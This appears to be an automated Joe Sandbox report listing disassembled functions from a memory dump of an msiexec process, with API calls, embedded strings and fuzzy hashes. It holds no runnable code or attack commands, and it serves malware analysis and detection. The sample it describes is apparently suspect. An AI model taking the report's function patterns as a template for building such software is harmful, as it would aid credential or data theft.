                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                                                    • API String ID: 0-1953309616
                                                                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                    Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                    • API String ID: 3510742995-272990098
                                                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                    Function 0040C3C3 Relevance: 7.6, APIs: 5, Instructions: 109registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                      • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                    • memset.MSVCRT ref: 0040C439
                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1265369119-0
                                                                                                    • Opcode ID: fcedaf62f28e4fa43429b70223f92c2d9bddde4a2c2a0188f501f40e4b32f332
                                                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                    • Opcode Fuzzy Hash: fcedaf62f28e4fa43429b70223f92c2d9bddde4a2c2a0188f501f40e4b32f332
                                                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                    Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0044A6EB
                                                                                                    • memset.MSVCRT ref: 0044A6FB
                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                    • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                    • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                    Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                    • free.MSVCRT ref: 0040E9D3
                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2241099983-0
                                                                                                    • Opcode ID: e158b21779275c2f16096f6bceaa7d57dd351cf6c867271926deb1a7a225879b
                                                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                    • Opcode Fuzzy Hash: e158b21779275c2f16096f6bceaa7d57dd351cf6c867271926deb1a7a225879b
                                                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                    Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                    • malloc.MSVCRT ref: 004174BD
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                    • free.MSVCRT ref: 004174E4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 4053608372-0
                                                                                                    • Opcode ID: 29219c5ddddbff2dbf9aa78c0a5be21ddae927893e5f94b27af47ce0abc09f40
                                                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                    • Opcode Fuzzy Hash: 29219c5ddddbff2dbf9aa78c0a5be21ddae927893e5f94b27af47ce0abc09f40
                                                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                    Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                    • String ID:
                                                                                                    • API String ID: 4247780290-0
                                                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                    Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                    • memset.MSVCRT ref: 004450CD
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1471605966-0
                                                                                                    • Opcode ID: 17950e47fd65c2a412c8c2a502ad0df1243ca40a545b1493a672e47798c62393
                                                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                    • Opcode Fuzzy Hash: 17950e47fd65c2a412c8c2a502ad0df1243ca40a545b1493a672e47798c62393
                                                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                    Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                    • String ID: \StringFileInfo\
                                                                                                    • API String ID: 102104167-2245444037
                                                                                                    • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                    • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                    Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                    Function 00401942 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                    • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$PlacementWindow
                                                                                                    • String ID: AE
                                                                                                    • API String ID: 3548547718-685266089
                                                                                                    • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                    • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                    • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                    • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                    Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _memicmpwcslen
                                                                                                    • String ID: @@@@$History
                                                                                                    • API String ID: 1872909662-685208920
                                                                                                    • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                    • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                    Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004100FB
                                                                                                    • memset.MSVCRT ref: 00410112
                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                    • String ID: </%s>
                                                                                                    • API String ID: 3400436232-259020660
                                                                                                    • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                    • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                    Function 0040E758 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040E770
                                                                                                    • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendmemset
                                                                                                    • String ID: AE$"
                                                                                                    • API String ID: 568519121-1989281832
                                                                                                    • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                    • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                    Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D58D
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                    • String ID: caption
                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                    • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
